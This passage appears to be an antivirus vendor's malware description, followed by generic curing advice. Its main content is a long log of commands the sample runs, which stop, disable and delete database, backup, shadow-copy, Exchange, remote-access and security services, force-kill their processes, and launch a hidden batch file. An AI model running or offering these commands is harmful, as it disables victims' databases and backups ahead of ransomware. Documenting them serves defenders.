  • '<SYSTEM32>\net1.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\net1.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop "SQLWrite"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\net1.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net1.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop MSSQL$
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net1.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' config "SQL Server (MSSQLSERVER)" start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net1.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net1.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkil...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" ...
  • '<SYSTEM32>\cmd.exe' /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /I...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc confi...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAM...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\net1.exe' stop SQLBrowser
  • '<SYSTEM32>\sc.exe' config MSSQL$ start=disabled
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT....
  • '<SYSTEM32>\net1.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start=disabled
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\net1.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\net1.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\net1.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' config MSSQL$VIM_SQLEXP start=disabled
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete zyb_sync
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net1.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\net1.exe' stop "ReportServer"
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\net1.exe' stop vmvss
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\sc.exe' config MSSQL$FE_EXPRESS start= disabled
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop "TMBMServer"
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\sc.exe' config vmvss start=disabled
  • '<SYSTEM32>\net1.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4EDA.tmp\4EDB.tmp\4EDC.bat <Full path to file>"' (with hidden window)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android on the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
